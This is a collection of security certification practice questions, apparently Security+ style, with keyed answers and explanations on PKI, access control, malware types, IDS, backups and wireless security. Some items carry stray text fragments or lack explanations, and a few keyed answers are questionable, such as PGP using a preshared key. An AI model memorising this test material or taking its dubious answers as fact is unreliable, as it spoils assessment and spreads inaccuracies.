B. In a PKI, an asymmetric key pair is created. The private key is kept secret, but the public key is distributed as needed. It is this public key that should be submitted to the CRL so that no other entities utilize it. A new key pair will then be created at the CA. See the section titled "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A new CA is not necessary. It would only be necessary if the entire CA was compromised, which is not part of the scenario. The private key is not seen by other entities, so only the public key should be submitted to the CRL. Key escrow is when copies of keys are kept in the case a third party needs access to data.

You have completed the deployment of PKI within your organization's network. Legally you are required to implement a way to provide decryption keys to a governmental third party on an as-needed basis. Which of the following should you implement? Additional certificate authority Key escrow Recovery agent Certificate registration

B. Key escrow should be implemented so that the governmental third party can be provided decryption keys as necessary. Key escrow is when certificate keys are held in the case that third parties such as government or other organizations need access to encrypted communications.

What is the purpose of LDAP authentication services? To prevent multifactor authentication To act as a single point of management To implement MAC To issue one-time passwords

B. LDAP (Lightweight Directory Access Protocol) contains the directory for a network and allows for a single point of user management of that directory.

You and several others on the IT team are deciding on an access control model. The IT director wants to implement the strictest access control model available, ensuring that data is kept as secure as possible. Which of the following access control models should you and your IT team implement? Discretionary access control Mandatory access control Role-based access control Rule-based access control

B. Mandatory access control (MAC) is the strictest access control model listed in the answers. It is a well-defined model used primarily by the government. It uses security labels to define resources. See the section titled "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: In the discretionary access control (DAC) model, the owner decides which users are allowed to have access to objects; it is not as strict as MAC. Role-based access control (RBAC) is an access model that, like MAC, is controlled by the system but differs from MAC in the way permissions are configured; it is not as strict as MAC.

You are the security administrator for your organization and have just completed a routine server audit. You did not notice any abnormal activity. However, another network security analyst finds connections to unautho- rized ports from outside the organization's network. Using security tools, the analyst finds hidden processes that are running on the server. Which of the following has most likely been installed on the server? A. SpamB. RootkitC. BackdoorD. Logic bombE. Ransomware

B. Most likely, a rootkit was installed. These can evade many routine scans, so there is no fault here. It's just that more in-depth analysis was re- quired to find the rootkit. The hidden processes are the main indicator of the rootkit. Spam is simply harassment by e-mail (and other messaging sys- tems), to put it nicely. Backdoors are programmed ways to bypass security of an operating system. A logic bomb is code that defines when a particular type of malware will execute. Ransomware is when a computer is opera- tionally held hostage; files are not retrievable by the user (because they have been encrypted) until a ransom is paid. It's important to run in-depth scans periodically. They can be time consuming, but they can uncover many threats and vulnerabilities that would otherwise go unnoticed. We'll discuss these types of scans more in Chapters 12 and 13.

You investigate an executive's laptop and find a system-level kernel module that is modifying the operating system's functions. What is this an example of? Logic bomb Virus Rootkit Worm

B. Rootkits are designed to gain administrative control over an OS without being detected and perform malicious operations. See the section titled "Malicious Software Types" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: Worms and viruses affect files but not the kernel of the OS. Logic bombs are ways of delivering malicious software at a specific date.

Which of the following would a routine system audit most likely include? Penetration testing User rights and permissions reviews Security policy development Port scanning

B. Routine system audits will check for user rights and permissions as well as analyze log files (for example, the Security log in Windows). The development and implementation of the security policy that enabled the security log should have been done long before actual auditing takes place. See the section titled "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Penetration testing and port scanning are not included in routine system audits but might be part of more elaborate security audits. Routine system audits are noninvasive (passive), allowing the systems to be audited to continue functioning as normal.

What is the main reason to frequently view the logs of a DNS server? A. To create aliasesB. To watch for unauthorized zone transfersC. To defend against denial-of-service attacksD. To prevent domain name kiting

B. Security administrators should frequently view the logs of a DNS server to monitor any unauthorized zone transfers. Aliases are DNS names that redirect to a hostname or FQDN. Simply viewing the logs of a DNS server will not defend against denial-of-service attacks. Domain name kiting is the process of floating a domain name for up to five days without paying for the domain name.

Which of the following is a trusted OS implementation used to prevent malicious code from executing on Linux platforms? System File Checker (SFC) SELinux Tripwire vmlinuz

B. Security-Enhanced Linux (SELinux) is a feature that supports mandatory access control and includes modifications that add security to Linux distributions to help prevent malicious and suspicious code from executing. See the section titled "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: System File Checker (SFC) is a utility in Windows that checks the integrity of system files and replaces them if necessary. Tripwire is Linux-based open source software designed to check data integrity and alert users to changes. Vmlinuz is a compressed bootable version of the Linux kernel.

In a PKI, what is responsible for verifying certificate contents? Key escrow CA CRL Recovery agent

B. The CA (certificate authority) is responsible for verifying the authenticity of certificate contents. See the section titled "Public-Key Infrastructure" in Chapter 14, "PKI and Encryption Protocols," for more information. Incorrect answers: Key escrow is when a copy of the key is held, usually by third parties. The CRL is the certificate revocation list, where certificates are listed when their corresponding public key has been compromised. The recovery agent is used to recover keys, key components, and plaintext messages.

You are the network security administrator. One of the system administrators reports to you that an unauthorized user has accessed the network. What should you do first? Contact the police. Contain the problem. Determine the monetary impact. Notify management.

B. The first thing you should do is contain the problem. That can mean attracting the unauthorized user to a honeypot or honeynet or shutting down the affected systems. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Afterward, depending on policy, you might notify management and possibly contact the police. Finally, you would determine the monetary impact after assessing the damage to the affected systems, if there were any.

One of the developers in your organization installs a new application in a S=207.50.135.54:53 - D=10.1.1.80:5 test system to test its functionality before implementing into production. Which of the following is most likely affected? A. Application securityB. Initial baseline configurationC. Application designD. Baseline comparison

B. The initial baseline configuration is most likely affected. Because the application has just been installed, there is only an initial baseline, but no other baselines to yet compare with. Since it is a testing environment, and the developer has just installed the application, security is not a priority. The developer probably wants to see what makes the application tick, and possi- bly reverse engineer it, but is not yet at the stage of application design, and probably won't be until a new application or modification of the current ap- plication is designed.

Which of following log files would be the most useful in determining which internal user was the source of an attack that compromised another computer on the same network? Directory Services logs The attacking computer's audit logs The firewall logs The target computer's audit logs

B. The target computer's audit logs should show the IP address and MAC address of the attacking computer if it were within the same network. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Directory Services logs give information about Active Directory on a domain controller. It would be difficult to find out who the attacking computer is, which is why you look to the target computer (the computer that was affected by the attack) for clues. The firewall logs show information concerning attackers from outside the network but will probably not give information about attackers inside the network.

Susan is in charge of installing a business-critical application on an Internet-facing server. She is going to update the application to the most current version. What other security control should she perform in conjunction with the update? Run a port scan of the application server. Review and apply vendor-provided hardening documentation. Configure the firewall to prevent the application from auto-updating. Configure the firewall to allow the application to auto-update.

B. Third-party applications will usually come with a slew of documentation, including a list of hardening methods. This vendor documentation should be applied while updating the application as part of the entire application security process. It is the best answer as far as what to do in conjunction with the update. See the section titled "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: Running a port scan is a good idea at some point, but it has less to do with the application and more to do with finding unnecessary ports and services. If the application is installed on an Internet-facing server, there probably won't be a firewall involved. If the application server is in a DMZ, it will probably be behind a firewall, but, by definition, even if the DMZ-based application serves users on the Internet, this isn't considered to be directly Internet-facing. Otherwise, the firewall should usually be set up to allow an application to auto-update, but you never know—some applications might need to be updated manually, depending on the security level of the application and organizational policy.

Your CFO's smartphone holding classified data has been stolen. What is the best way to reduce data leakage? Inform law enforcement. Track the device with GPS. Remotely sanitize the device. Use strong encryption.

C

You are contracted with a customer to protect its user data. The customer requires the following: Easy backup of all user data Minimizing the risk of physical data theft Minimizing the impact of failure on any one file server Which of the following solutions should you implement? Back up user files to USB hard disks attached to the customer's systems. Store the USB hard disks in a secure area after hours. Use file servers with removable hard disks. Secure the hard disks in a separate area after hours. Use internal hard disks installed in file servers. Lock the file servers in a secure area. Use file servers attached to a NAS. Lock the file servers and NAS in a secure area.

B. Using file servers with removable hard disks is the best answer. See the section "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: All the other answers do not offer easy backup of user data. The time it would take to use separate USB hard disks makes it anything but easy. The idea of locking entire servers in a secure area doesn't sound easy either. However, securing removable hard disks in a separate area seems like an easy way to implement the solution. It should also minimize the risk of physical data theft because the hard disks are stored in a secure area. Using multiple file servers should minimize the impact of failure on any one file server.

The IT director asks you to determine if weak passwords are used by any of the users on your network. You run a password-cracking program to determine this. What is this an example of? Antivirus scanning Vulnerability assessment Fingerprinting Baselining

B. Vulnerability assessments can include password analysis, port scanning, network mapping, and network sniffing.

When is it appropriate to use vulnerability scanners to identify any potential holes in your security design? When testing disaster mitigation planning When testing to identify known potential security risks inherent to your design When testing the network's response to specific attacks When testing the automatic detection and alerts of your network

B. When it is time to identify known potential security risks that might be inherent to the design of your network, it is appropriate to use vulnerability scanners.

How do most network-based viruses spread? A. By optical discB. Through e-mailC. By USB flash driveD. By instant messages

B.E-mail is the number one reason why network-based viruses spread. All a person needs to do is double-click the attachment within the e-mail, and the virus will do its thing, which is most likely to spread through the user's address book. Removable media such as optical discs and USB flash drives can spread viruses but are not nearly as common as e-mail. A virus can also spread if it was incorporated into a link within an instant message, or as an attachment to the IM. This is definitely something to protect against, but not quite as common as e-mail-based viruses, especially in larg- er organizations' networks.

Your Windows domain has additional servers configured as member servers. Your job is to minimize the risk of unauthorized persons logging on locally to the member servers. Your solution should have a minimal impact on local management and administration and should not limit administrator access. Which of the following are the best solutions? (select two) Disable account lockout policies. Require strong passwords. Rename the local default accounts. Configure all services to run under the context of the Local System account. Disable the local default accounts. Provide backdoors into the member servers.

BC. By renaming the local default accounts (which includes the administrator account), users will have a difficult time attempting to select a username with administrative access. Most people know that the default administrative account in Windows is the administrator account; by renaming it you add a layer of security. Requiring strong passwords is always a good idea and can help prevent an unauthorized user from logging on to the member server. On some Windows systems, by default, the administrator account has a blank password. It is common procedure to rename the account and configure a complex password. See the section titled "Rights, Permissions, and Policies" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Disabling account lockout policies makes the server less secure. By default, services do run under the local system account. Disabling the local default accounts would also disable the administrator account, and the question specifies that administrator access should not be limited. It is not a good idea to provide backdoors into any servers or devices; if backdoors are found, they should be eliminated or reported to the vendor of the software.

You are logging a server. What security measures should you implement? (select two) Perform CRCs Perform hashing of the log files Apply retention policies on the log files Collect temporary files

BC. You need to retain log files for future analysis. Log files are normally not deleted, and sometimes operating systems will overwrite events in log files after they reach their maximum size. Careful consideration should be taken when configuring log files. Hashing the log files enables people in the future to verify the integrity of those log files and verify that the files have not been tampered with. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: A cyclic redundancy check (CRC) is an error-detecting code that runs automatically, and isn't really something that would be performed per se. CRCs and collecting temporary files are not necessary when it comes to log files.

What are the best reasons to use an HSM? (select two) To recover keys To store keys For a CRL To generate keys To transfer keys to the hard drive

BD

You have been instructed to install an intrusion detection system that can protect a database server and the rest of the network. You cannot afford to use any more resources on the database server. You decide to implement a network intrusion detection system. Why is this superior to a host-based intrusion detection system? (select two) A HIDS is not reliable when it comes to detecting attacks. Usually, a HIDS cannot detect network attacks. A HIDS cannot be updated. A HIDS can negatively impact system performance.

BD. A HIDS usually cannot detect network attacks, whereas a NIDS can. A HIDS will definitely have a negative impact on system performance because it uses resources in the form of CPU and RAM; however, a HIDS is reliable when it comes to detecting attacks on an individual computer. Also, a HIDS can be updated.

Robert has been asked to make sure that a server is highly available. He must ensure that hard drive failure will not affect the server. Which of the following methods allows for this? (select two) True clustering Software RAID 1 Load balancing Hardware RAID 5 Software RAID 0

BD. RAID 1 (mirroring) and RAID 5 (striping with parity) are both fault-tolerant methods that will allow for high availability and ensure that hard drive failure will not affect the server. See the section titled "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: True clustering is when multiple computers' resources are used together to create a faster, more efficient system; it often uses load balancing to accomplish this. However, true clustering does not necessarily allow for fault tolerance of data. RAID 0 (striping) is not fault tolerant because there is no parity information.

Which of the following are symmetric encryption algorithms? (select four) ECC AES RSA DES RC4 Diffie-Hellman 3DES

BDEG

Sherry must prevent users from accessing the network after 6 p.m. She must also prevent them from accessing the accounting department's shares at all times. Which of the following should Sherry implement? (select two) Single sign-on Access control lists MAC Job rotation Time-of-day restrictions

BE. To prevent users from accessing the network after 6 p.m., Sherry should implement time-of-day restrictions. If these restrictions are configured properly, the users will not be able to log in except during the times Sherry allows. To prevent the users from accessing the accounting department shares, she should set up access control lists. In most operating systems these access control lists (or ACLs) are referred to as rights or permissions.

Hardware-based encryption devices such as hardware security modules (HSMs) are sometimes deployed by organizations more slowly than in other organizations. What is the best reason for this? RBAC USB removable encryption Lack of management software Multifactor authentication

C. A lack of management software can cause slower deployment of HSMs. Because an HSM is an external device, it requires management software to enable it to communicate with the computer it is connected to. The lack of decent management software could cause decision-makers at organizations to hesitate to adopt the solution. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: RBAC stands for role-based access control, which assigns roles to users based on sets of permissions. USB removable encryption is a decent solution for encrypting data, but unlike an HSM, it can't house extremely secure keys and doesn't have tamper protection, so USB removable encryption isn't really a substitute for an HSM. Multifactor authentication means that a user needs to have two forms of ID or needs to be authenticated in two or more ways to a system.

Users are required to log in to the network. They use a smart card to do so. Which type of key does the smart card use to log in to the network? Cipher key Shared key Private key Public key

C. A private key is used by smart cards during login to a network. Often the smart card will be used along with another form of authentication, creating a multifactor authentication scheme. See the section titled "Physical Security" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Public keys are used in asymmetric encryption environments. A key is basically one component of a cipher or algorithm. A shared key is often used in public-key environments and asymmetric encryption environments, in which two users share the same key.

What kind of monitoring methodology does an antivirus program use? Anomaly-based Behavior-based Signature-based Statistical-based

C. Antivirus programs normally use signature-based monitoring. IDS solutions also use this. Signature-based monitoring analyzes frames and packets of network traffic for predetermined attack patterns. See the section "Monitoring Methodologies" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Anomaly-based monitoring establishes a performance baseline based on a set of normal network traffic and valuations. Behavior-based monitoring looks at the previous behavior of applications and compares that to the current activity on the system. Statistical-based monitoring is another name for anomaly-based monitoring.

A security assessment of an existing application has never been made. Which of the following is the best assessment technique to use to identify an application's security posture? Functional testing Threat modeling Baseline reporting Protocol analysis

C. Baseline reporting is the best answer for identifying the application's security posture. A Security Posture Assessment (SPA) is used to find out the baseline security of an application, a system, or a network, as long as the application (or system or network) already exists. By checking past results and comparing them with current (and future) results, a security professional can see whether an application is secure or has a "secure posture." Some applications come with built-in baseline reporting tools, which allow you to tell whether a system is compliant and secure. See the section titled "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The other three answers don't (by definition) associate with the "security posture" of an application. Functional testing is a method of verifying a program by inputting information to the program and analyzing the output. Threat modeling defines a set of possible attacks that could exploit a vulnerability. Protocol analysis deals with examining packet streams with a sniffer or protocol analyzer.

You want to secure your data to retain it over the long term. What is the best way to do this? Onsite clustering Virtualization Offsite backup RAID 5 onsite backup

C. For purposes of retention, offsite backup is the best option. By keeping your backups offsite, you mitigate the risk of losing data during a disaster to your main office. See the section titled "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: All of the other options imply onsite backup or virtualization onsite, all of which are at risk if a disaster occurs at the main office.

Which of the following types of scanners can locate a rootkit on a computer?A. Image scannerB. Barcode scannerC. Malware scannerD. Adware scanner

C. C. Malware scanners can locate rootkits and other types of malware. These types of scanners are often found in anti-malware software from man- ufacturers such as McAfee, Symantec, and so on. Adware scanners (often free) can scan for only adware. Always have some kind of anti-malware soft- ware running on live client computers!

Which of following is the most basic form of IDS? A. Anomaly-basedB. Behavioral-basedC. Signature-basedD. Statistical-based

C. C. Signature-based IDS is the most basic form of intrusion detection sys- tem, or IDS. This monitors packets on the network and compares them against a database of signatures. Anomaly-based, behavioral-based, and sta- tistical-based are all more complex forms of IDS. Anomaly-based and statis- tical-based are often considered to be the same type of monitoring methodology.

A user complains that they were browsing the Internet when the com- puter started acting erratically and crashed. You reboot the computer and notice that performance is very slow. In addition, after running a netstat command you notice literally hundreds of outbound connections to various websites, many of which are well-known sites. Which of the following has happened? A. The computer is infected with spyware.B. The computer is infected with a virus.C. The computer is now part of a botnet.D. The computer is now infected with a rootkit.

C. C. The computer is probably now part of a botnet. The reason the system is running slowly is probably due to the fact that there are hundreds of out- bound connections to various websites. This is a solid sign of a computer that has become part of a botnet. Spyware, viruses, and rootkits might make the computer run slowly, but they will not create hundreds of outbound connections.

To prevent ad hoc configuration issues on your wireless network, what method should you implement? Incident management strategy Auditing strategy Change management strategy Patch management strategy

C. Change management is a structured way of making changes to networking equipment and other systems. It is done in such a way that everyone involved is notified of a change. If a person were to add networking devices to an ad hoc wireless network without consulting anyone else, it could cause many issues, including, but not limited to, loss of access to the network. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Incident management (and incident response) is a set of procedures that a person goes through when examining a computer or network-related security incident. Patch management is the planning, testing, implementing, and auditing of patches that are installed on systems. Auditing strategies in patch management involve making sure the patch holds properly over time. In general, auditing strategies are implemented to properly record and review what happens to data within the various servers and other computers on the network.

Which of the following techniques enables an already secure organiza- tion to assess security vulnerabilities in real time?A. BaseliningB. ACLsC. Continuous monitoring D. Video surveillance

C. Continuous monitoring will help an already secure organization to assess security vulnerabilities and weaknesses in real time. Baselining and ACLs are things that have happened, or were configured in the past. Video surveillance is surely in real time, but it is doubtful as to whether it can as- sess security vulnerabilities in real time, even if someone is watching the video stream as it happens.

An attacker has identified and exploited several vulnerabilities in a closed-source application that your organization has developed. What did the attacker implement? Secure code review Vulnerability testing Fuzzing Compiling

C. Fuzzing (fuzz testing) is the automated insertion of random data into a computer program. It is used to find vulnerabilities by the people who developed the program and by attackers. See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Secure code review is the analysis of source code by authorized individuals in an attempt to find problems and security issues

Which of the following should be done if an audit recording fails? A. Stop generating audit records.B. Overwrite the oldest audit records.C. Send an alert to the administrator.D. Shut down the server.

C. If an audit recording fails, there should be sufficient safeguards em- ployed that can automatically send an alert to the administrator, among oth- er things. Audit records should not be overwritten and in general should not be stopped.

You have been tasked with securing a switch from physical access. Which of the following should you implement first? Set up access control lists. Check the baseline configuration. Disable unused ports. Disable unnecessary accounts.

C. If you need to physically secure a switch, you should first disable unused ports so that a person who has gained unauthorized access to your server room or data center cannot plug a laptop into one of those ports and access the network. It would also be wise to check (or create) a security baseline at some point after this. See the section titled "Network Design" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: Access control lists are generally set up on routers, not on switches. Regardless, they deal with the logical, not the physical. The same holds true for accounts; they are of a logical nature and are usually set up on servers and routers.

A computer that is connected to an NAC-enabled network is not asked for the proper NAC credentials. What is a possible reason for this? The computer is not patched. The computer doesn't have the latest antivirus definitions. The computer is missing the authentication agent. The computer does not have the latest SP.

C. In a network access control (NAC) enabled network, computers must have the authentication agent installed; otherwise, the NAC system will not ask for the credentials (and the computer will not get access to the network). The authentication agent is also known as a supplicant (in 802.1X systems, for example). See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: The patch level, antivirus definitions, and service packs (SPs) are separate from the NAC system.

Which of the following is the best practice to implement when securing logs files?A. Log all failed and successful login attempts.B. Deny administrators access to log files.C. Copy the logs to a remote log server.D. Increase security settings for administrators.

C. It is important to copy the logs to a secondary server in case some- thing happens to the primary log server; this way you have another copy of any possible security breaches. Logging all failed and successful login at- tempts might not be wise, because it will create many entries. The rest of the answers are not necessarily good ideas when working with log files.

What is one reason to implement security logging on a DNS server? To perform penetration testing on the server To prevent DNS DoS To watch for unauthorized zone transfers To measure server performance

C. It is important to log your DNS server to monitor for unauthorized zone transfers. This type of logging can only let you know if an unauthorized zone transfer has occurred; it will not prevent it, nor will it prevent any types of denial-of-service (DoS) attacks.

Your organization wants to improve its security posture by addressing risks uncovered by a recent penetration test. Which of the following is most likely to affect the organization on a day-to-day basis? Large-scale natural disaster Corporate espionage Lack of antivirus software Insufficient encryption

C. Of the answers, the most likely to affect the organization on a day-to-day basis is a lack of antivirus software. Let's say the organization had 100 computers and 20% of them were not protected by AV software. Chances are that a good portion of those computers would be infected over the course of the year. AV software should be installed on all client systems and patched regularly. Centralized management software can be used to scan the network and find out what systems are not up to date. See the section "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: A penetration test is used to discover weaknesses in a server or a network. It does not tell you the likelihood of a natural disaster, but the chances of one are slim, and much less likely to affect the organization than a lack of AV software. Corporate espionage could be more common, especially if an organization deals with government secrets, patents, new products, and so on. But, once again, a penetration test will probably not uncover corporate espionage. Insufficient encryption is the next best answer to lack of AV software. It is a definite problem, but it all depends on the organization in question. Some organizations require more encryption than others. Still, it is not likely to affect an organization as much as a lack of AV software.

Which of the following is the best description of a security advantage when using a standardized server image? All antivirus software will be current. All current updates for the OS will already have been applied. All mandated security configurations will already have been applied to the OS. OS licensing will be easier to track.

C. Organizations develop standardized images for their server operating systems. They are standardized according to organizational policy. So, any mandated security configurations should be applied to the OS before it is made into an image to be used on the network. Unfortunately, that only gets the OS image to a certain point in time. See the section titled "Virtualization Technology" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Any new AV definitions, security updates to the OS, and so on, will need to be applied afterward according to organizational policy. OS licensing trackability should not change. Whether you track your OS licenses on paper or with a scanning program, they should be tracked in the same manner as with physical operating systems.

When authenticating with PEAP, what is used to provide mutual authentication between peer computers? MSCHAPv110-056 MD5 MSCHAPv2 EAP

C. PEAP uses MSCHAPv2 most commonly. This supports authentication via Microsoft Active Directory databases. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: MSCHAPv1 does not allow this and is not used in PEAP. MD5 is not an authentication method and is not used by PEAP. However, MD5 is used in EAP-MD5 (as a hashing algorithm), which is also challenge-based. PEAP is a derivative of EAP (Extensible Authentication Protocol).

Which of the following encryption protocols uses a PSK? TPM CRL PGP DLP

C. PGP (Pretty Good Privacy) uses a preshared key (PSK), which was previously shared between two parties using a secure channel before it is used to decrypt data.

Which of the following is the best reason to perform a penetration test? To identify all vulnerabilities and weaknesses within your network To passively test security controls To determine the potential impact of a threat against your network To find the security posture of the network

C. Penetration tests are usually designed to simulate a particular attack, allowing the administrator to determine the potential impact of that threat to the network. See the section titled "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Penetration tests are not designed to identify all vulnerabilities and weaknesses; to do that, you would use a vulnerability scanner, among other things. Penetration tests are not passive; they are active tests that should be done off-hours and with much preparation beforehand. The security posture of the network is usually discerned by security assessments and baseline reporting.

Which of the following solutions should be used by heavily utilized networks? VPN concentrator Remote access Provider cloud Telephony

C. Provider clouds can offer Infrastructure as a Service (IaaS), which can alleviate some of the stress an organization's network might suffer from. In addition, provider clouds can offer software (SaaS) and platforms (PaaS). See the section titled "Cloud Security and Server Defense" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: VPN concentrators and remote access are not good choices for heavily utilized networks. They are meant for smaller groups of remote users. Telephony is not a solution for heavily utilized networks. It is quite the opposite; often networks are the solution for telephony usage.

To determine network access requirements, a person working in HR has been tasked with assigning users in Accounting the same job function. What is this an example of? MAC DAC RBAC ACL

C. Role-based access control (RBAC) is when individuals are assigned groups of permissions that constitute a role. While a person in HR might not assign job functions within the operating system directly, the person will commonly assign the job functions for each user in some type of paper or electronic document and deliver that document to a security administrator who then implements those job functions within the operating system. See the section titled "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Mandatory access control (MAC) is a model that determines permissions by a computer system. Discretionary access control (DAC) is when permissions are determined by the owner. An ACL is an access control list, which defines what IP addresses (or users) can access particular networks or resources.

You need to protect passwords. Which of the following protocols is not recommended because it can supply passwords over the network? DNS ICMP SNMP Kerberos

C. SNMP (Simple Network Management Protocol) can pass passwords over the network. This can be a security risk and should be avoided if possible. Or at the very least, use the latest version of SNMP, and be careful to protect devices that use SNMP for monitoring, such as switches, UPSs, and so on. See the section "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: DNS (Domain Name System) and ICMP (Internet Control Message Protocol) do not supply passwords over the network. Kerberos can possibly supply passwords over the network, but they will be in an encrypted format and difficult to crack.

A security incident just occurred involving a physical asset (a USB flash drive). Immediately afterward, what should be done first? Document the incident and how it was mitigated Create a working image of the data Record every person who was in possession of the asset during and after the incident Back up the device

C. The first thing you want to know is who was in possession of the USB flash drive. This will be important for your chain of custody, in case the asset is used as evidence in a trial. After the incident, continue logging who takes possession of the drive and when. See the section "Incident Response Procedures" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Documentation is important, and in fact, recording each person who was in possession of the drive is a form of documentation. But other documentation such as mitigation methods are not important right away, aside from the fact that mitigation might not have been implemented yet. You don't want to back up the device because that will actually write information to the drive, but you should image it for data preservation purposes. However, this would be done after you document who had possession of the drive.

Tom is getting reports from several users that they are unable to download specific items from particular websites, although they can access other pages of those websites. Also, they can download information from other websites just fine. Tom's IDS is also sending him alarms about possible malicious traffic on the network. What is the most likely cause why the users cannot download the information they want? The firewall is blocking web activity. The NIDS is blocking web activity from those specific websites. The NIPS is blocking web activity from those specific websites. The router is blocking web activity.

C. The most likely answer is that the network intrusion prevention system (NIPS) is blocking the specific traffic because it has detected that particular downloads could be malicious. See the section titled "NIDS Versus NIPS" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A NIDS would only detect this and send alarms to Tom; it would not prevent the traffic. The firewall will usually block entire websites from being accessed, not just prevent specific downloads. The router will not block web activity, although it could block access to particular IP addresses. However, if this were the case, the users would not be able to access the website in question.

When you arrive at work in the morning, you discover that the server room has been the victim of a fire, and all the servers have been rendered useless. Which of the following is the most important item to have to ensure that your organization can recover from this disaster? Warm site Offsite backup Disaster recovery plan Fault-tolerant servers

C. The single most important thing that you should have in the case of a disaster is a disaster recovery plan (DRP). This needs to detail exactly who you should contact, what you should do, where you should go, and where your data should be located in the case of a disaster. See the section "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: A warm site is a secondary work location designed for your employees that can be up and running in a matter of hours. Offsite backup means that your files are backed up (often to tape), and transported to a separate secure location. Fault-tolerant servers are ones that can keep running in the event of a failure—they could be onsite or offsite—in the case of offsite they might exist in the cloud and interact with onsite servers. A DRP should include everything mentioned: warm sites, offsite backup, and fault tolerant servers.

You are configuring an 802.11n wireless network. You need to have the best combination of encryption and authorization. Which of the following options should you select? WPA2-PSK WEP and 802.1X WPA-Enterprise WPA and TKIP

C. WPA-Enterprise offers a decent level of encryption (WPA) as well as a powerful means of authorization (Enterprise). Enterprise usually means you are using a separate RADIUS server, or something similar, to handle the authorization side of things and are not relying on the wireless device itself. See the section titled "Securing Wireless Networks and Devices" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Although WPA2-PSK offers a better level of encryption, it does not offer authorization the way an enterprise configuration does. The combination of WEP and 802.1X does offer a form of authorization, but WEP is deprecated and is not recommended in any scenario. Combining WPA and TKIP offers the same level of encryption as WPA-Enterprise but does not offer authorization.

Which of the following computer security threats can be updated auto- matically and remotely? (Select the best answer.) A. VirusB. WormC. ZombieD. Malware

C. Zombies (also known as zombie computers) are systems that have been compromised without the knowledge of the owner. A prerequisite is the computer must be connected to the Internet so that the hacker or malicious attack can make its way to the computer and be controlled remotely. Multi- ple zombies working in concert often form a botnet. See the section "Delivery of Malware" earlier in this chapter for more information.

You are in charge of decreasing the chance of social engineering in your organization. Which of the following should you implement? A two-factor authentication scheme Vulnerability assessment Security awareness training Risk assessment

CD. Of the listed answers, the two best ways to decrease social engineering are to incorporate security awareness training and implement a multifactor authentication scheme. For example, users might be required to identify themselves with an ID card and by presenting a thumbprint for biometric scanning. See the section "Social Engineering Methods and Prevention" in Chapter 17 "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Risk assessments and vulnerability assessments are performed to find out what kind of threats an organization faces. A viable threat might include social engineering; however, risk and vulnerability assessments will not decrease the chance of social engineering occurring.

What should a disaster recovery plan (DRP) contain? Hierarchical access control lists Single points of failure Hierarchical list of hot sites Hierarchical list of critical systems

D. A disaster recovery plan should contain (among other things) a list of critical systems in order from the most critical to the least critical. See the section titled "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: Access control lists don't fail, but the router that they are contained within may fail; therefore, the routers should be listed as critical systems. Anything could be a single point of failure. If a single point of failure cannot be tolerated, it needs to be mitigated in the form of fault tolerance (UPS, RAID, clustering, and so on). Generally, an organization will have only one hot site because hot sites are expensive to maintain.

What is a malicious attack that executes at the same time every week? A. VirusB. WormC. RansomwareD. Logic bomb

D. A logic bomb is a malicious attack that executes at a specific time. Viruses normally execute when a user inadvertently runs them. Worms can self-replicate at will. Ransomware is a type of malware that restricts access to files (or entire systems) and demands a ransom be paid.

A customer has asked you to implement a solution to hide as much information about the internal structure of the network as possible. The customer also wants to minimize traffic with the Internet and does not want to increase security risks to the internal network. Which of the following solutions should you implement? NIDS Firewall Protocol analyzer Proxy server

D. A proxy server, specifically a caching proxy, will minimize traffic with the Internet. Users who access the same websites will get their information from the proxy server instead of from the Internet. An IP proxy server will hide information about the internal structure of the network. Proxy servers are available that can handle both of these functions. See the section titled "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A NIDS, network intrusion detection system, detects attacks on the network. A firewall closes off ports on the network, and although some firewalls also come with proxy functionality, it is not the best answer for this scenario. Protocol analyzers, also known as network sniffers, can analyze packets of information that have been captured.

One of the users in your organization is attempting to access a secure website. However, the certificate is not recognized by his web browser. Which of the following is the most likely reason? Weak certificate cipher No key escrow was implemented Intermittent Internet connection Self-signed certificate

